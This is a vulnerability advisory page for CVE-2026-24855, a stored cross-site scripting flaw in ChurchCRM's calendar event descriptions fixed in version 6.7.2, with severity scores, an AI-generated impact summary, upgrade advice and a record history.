Description
ChurchCRM is an open-source church management system. Versions prior to 6.7.2 have a Stored Cross-Site Scripting (XSS) vulnerability occurs in Create Events in Church Calendar. Users with low privileges can create XSS payloads in the Description field. This payload is stored in the database, and when other users view that event (including the admin), the payload is triggered, leading to account takeover. Version 6.7.2 fixes the vulnerability.
Published: 2026-01-30
Score: 7.2 High
EPSS: < 1% Very Low
KEV: No
Impact: Account Takeover via Stored XSS
Action: Apply Patch
AI Analysis

Impact

The vulnerability is a stored Cross‑Site Scripting flaw in the Create Events module of ChurchCRM. Low‑privilege users can inject malicious JavaScript into the Description field of an event. The script is persisted in the database and executed whenever the event is viewed, including by administrators, leading to session hijacking and potential full account takeover. The flaw represents a classic CWE‑79 weakness where input is not properly sanitized before reflection.

Affected Systems

The product affected is ChurchCRM, an open‑source church management system. All releases prior to version 6.7.2 contain the flaw; version 6.7.2 and later include the fix. The vulnerability is present in the Create Events feature within Church Calendar, affecting all users who can view these events.

Risk and Exploitability

The CVSS base score of 7.2 indicates a high likelihood of significant impact if exploited. The EPSS score is below 1 %, suggesting that the probability of real‑world exploitation is currently low. The flaw is not listed in the CISA Known Exploited Vulnerabilities catalog. The exploitation scenario requires an attacker with low privileges to create an event containing the XSS payload; when any user—including administrators—loads the event page, the injected script runs in the victim’s browser, enabling session theft or other malicious actions. This is therefore an internal or local exploitation vector, but once access is gained it can lead to full compromise of the victim’s account.

Generated by OpenCVE AI on April 18, 2026 at 01:06 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade ChurchCRM to version 6.7.2 or later to apply the official fix
  • If an upgrade cannot be applied immediately, restrict low‑privilege users from creating events or remove events containing potential XSS content before they are viewed
  • Sanitize or delete stored event descriptions that contain malicious scripts to eliminate existing risks

Generated by OpenCVE AI on April 18, 2026 at 01:06 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 17 Feb 2026 14:45:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Tue, 03 Feb 2026 15:00:00 +0000

Type Values Removed Values Added
First Time appeared Churchcrm
Churchcrm churchcrm
Vendors & Products Churchcrm
Churchcrm churchcrm

Fri, 30 Jan 2026 16:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Fri, 30 Jan 2026 15:30:00 +0000

Type Values Removed Values Added
Description ChurchCRM is an open-source church management system. Versions prior to 6.7.2 have a Stored Cross-Site Scripting (XSS) vulnerability occurs in Create Events in Church Calendar. Users with low privileges can create XSS payloads in the Description field. This payload is stored in the database, and when other users view that event (including the admin), the payload is triggered, leading to account takeover. Version 6.7.2 fixes the vulnerability.
Title ChurchCRM has Stored Cross-Site Scripting (XSS) in Create Events in Church Calendar, Leading to Account Takeover
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 7.2, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:H/SI:H/SA:H/E:P'}

Subscriptions

Churchcrm Churchcrm
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-01-30T15:50:58.147Z

Reserved: 2026-01-27T14:51:03.061Z

Link: CVE-2026-24855

cve-icon Vulnrichment

Updated: 2026-01-30T15:50:31.916Z

cve-icon NVD

Status : Analyzed

Published: 2026-01-30T16:16:13.790

Modified: 2026-02-17T14:32:44.697

Link: CVE-2026-24855

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T01:15:05Z

Weaknesses